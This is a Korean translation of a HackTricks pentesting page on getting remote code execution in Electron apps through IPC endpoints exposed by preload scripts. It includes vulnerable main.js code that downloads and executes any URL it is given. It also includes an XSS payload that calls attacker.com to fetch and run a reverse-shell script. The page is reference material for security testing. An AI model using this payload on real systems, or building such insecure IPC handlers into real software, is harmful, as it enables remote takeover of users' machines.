hacktricks/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md
2024-02-10 21:30:13 +00:00

5.2 KiB

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

만약 preload 스크립트가 main.js 파일에서 IPC 엔드포인트를 노출시킨다면, 렌더러 프로세스는 해당 엔드포인트에 접근할 수 있으며, 취약하다면 RCE가 가능할 수 있습니다.

이 모든 예시는 여기에서 가져왔습니다 https://www.youtube.com/watch?v=xILfQGkLXQo. 자세한 정보는 동영상을 확인하세요.

예시 1

main.jsgetUpdate를 수신 대기하고 전달된 모든 URL을 다운로드하고 실행하는지 확인하세요.
또한 preload.js가 main에서 모든 IPC 이벤트를 노출하는지 확인하세요.

// Part of code of main.js
ipcMain.on('getUpdate', (event, url) => {
console.log('getUpdate: ' + url)
mainWindow.webContents.downloadURL(url)
mainWindow.download_url = url
});

mainWindow.webContents.session.on('will-download', (event, item, webContents) => {
console.log('downloads path=' + app.getPath('downloads'))
console.log('mainWindow.download_url=' + mainWindow.download_url);
url_parts = mainWindow.download_url.split('/')
filename = url_parts[url_parts.length-1]
mainWindow.downloadPath = app.getPath('downloads') + '/' + filename
console.log('downloadPath=' + mainWindow.downloadPath)
// Set the save path, making Electron not to prompt a save dialog.
item.setSavePath(mainWindow.downloadPath)

item.on('updated', (event, state) => {
if (state === 'interrupted') {
console.log('Download is interrupted but can be resumed')
}
else if (state === 'progressing') {
if (item.isPaused()) console.log('Download is paused')
else console.log(`Received bytes: ${item.getReceivedBytes()}`)
}
})

item.once('done', (event, state) => {
if (state === 'completed') {
console.log('Download successful, running update')
fs.chmodSync(mainWindow.downloadPath, 0755);
var child = require('child_process').execFile;
child(mainWindow.downloadPath, function(err, data) {
if (err) { console.error(err); return; }
console.log(data.toString());
});
}
else console.log(`Download failed: ${state}`)
})
})
// Part of code of preload.js
window.electronSend = (event, data) => {
ipcRenderer.send(event, data);
};

Exploit (악용):

<script>
electronSend("getUpdate","https://attacker.com/path/to/revshell.sh");
</script>

예제 2

만약 preload 스크립트가 렌더러에 직접적으로 shell.openExternal을 호출할 수 있는 방법을 노출한다면 RCE를 얻을 수 있습니다.

// Part of preload.js code
window.electronOpenInBrowser = (url) => {
shell.openExternal(url);
};

예제 3

preload 스크립트가 메인 프로세스와 완전히 통신할 수 있는 방법을 노출한다면, XSS는 어떤 이벤트든지 보낼 수 있습니다. 이에 대한 영향은 메인 프로세스가 IPC 측면에서 노출하는 것에 따라 달라집니다.

window.electronListen = (event, cb) => {
ipcRenderer.on(event, cb);
};

window.electronSend = (event, data) => {
ipcRenderer.send(event, data);
};
htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법: